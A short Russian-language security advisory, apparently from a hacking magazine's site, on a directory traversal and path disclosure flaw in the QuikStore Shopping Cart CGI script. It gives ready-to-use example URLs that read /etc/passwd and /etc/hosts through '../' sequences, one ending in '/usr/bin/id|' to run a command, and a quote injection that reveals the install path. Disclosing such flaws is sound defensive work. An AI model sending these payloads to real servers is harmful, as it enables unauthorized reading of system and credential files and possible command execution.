Хакер #305. Многошаговые SQL-инъекции
Программа: QuikStore Shopping Cart
Уязвимость обнаружена в QuikStore shopping cart. Удаленный пользователь может просматривать файлы на системе. Удаленный пользователь может определить инсталляционный путь.
Удаленный пользователь может представить специально обработанный URL, содержащий '../' символы обхода каталога, чтобы просматривать произвольные файлы на системе с привилегиями процесса Web сервера.
Пример:
http://[target]/quikstore.cgi?blah&template= ../../../../../../../../../../etc/passwd%00.html
http://[target]/quikstore.cgi?blah&template=
../../../../../../../../../../../../etc/hosts
http://[target]/quikstore.cgi?blah& template=../../../../../../../../../../../../usr/bin/id|
Также удаленный атакующий может определить инсталляционный путь:
http://[target]/cgi-bin/quikstore.cgi?store='